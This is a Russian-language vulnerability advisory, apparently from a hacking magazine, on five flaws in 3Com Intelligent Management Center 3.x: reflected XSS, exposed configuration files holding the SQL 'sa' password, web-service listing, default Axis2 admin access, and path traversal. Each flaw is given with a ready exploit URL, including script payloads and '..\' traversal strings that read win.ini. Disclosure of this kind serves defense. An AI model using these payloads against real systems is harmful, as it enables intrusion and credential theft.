Хакер #305. Многошаговые SQL-инъекции
Программа: 3Com Intelligent Management Center (IMC) 3.x
Найденные уязвимости позволяют удаленному злоумышленнику осуществить DoS
атаку и выполнить произвольный код на целевой системе.
1) Уязвимость возникает из-за ошибки в проверке входных данных в параметре "javax.faces.ViewState"
сценарием imc/login.jsf и данных передаваемых через URL в imc/dwr/interface/.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Эксплоит:
http://target-domain.foo:8080/imc/login.jsf?loginForm%3a_link_hidden_=&javax.faces.ViewState=%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E
http://target-domain.foo:8080/imc/dwr/call/plaincall/blah?callCount=<script>alert(1)</script>
http://target-domain.foo:8080/imc/dwr/interface/<script>alert(1)</script>
2) Уязвимость возникает из-за ошибки в разграничении доступа к файлу
конфигурации "reportscript/oracle/deploypara.properties" в директории "/imc" и
файлу "reportscript/sqlserver/deploypara.properties" в директориях "/imc" и "/rpt".
Атакующий может выгрузить конфигурационные файлы и, например, просмотреть пароль
учетной записи SQL "sa".
Эксплоит:
http://target-domain.foo:8080/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=
reportParaExample.xml..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://target-domain.foo:8080/imc/reportscript/sqlserver/deploypara.properties
http://target-domain.foo:8080/rpt/reportscript/sqlserver/deploypara.properties
http://target-domain.foo:8080/imc/reportscript/oracle/deploypara.properties
3) Уязвимость возникает из-за ошибки в разграничении доступа к imcws/services/listServices.
Атакующий может получить доступ к содержимому конфигурации Web сервисов.
Эксплоит:
http://target-domain.foo:8080/imcws/services/listServices
http://target-domain.foo:8080/imcws/axis2-admin/
4) Уязвимость возникает из-за того, что возможно получить доступ к консоли
Axis2 ("imcws/axis2-admin/") используя права доступа по умолчанию.
Эксплоит:
http://target-domain.foo:8080/imcws/
5) Уязвимость возникает из-за того, что данные передаваемые через параметры "fileName"
и "fileDir" в /imc/report/DownloadReportSource не правильно проверяются перед
использованием. Атакующий может выгрузить произвольные файлы на целевой системе.
Эксплоит:
http://target-domain.foo:8080/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports..\..\..\..\..\..\..\..\windows\win.ini%00reports&fileName=reportParaExample.xml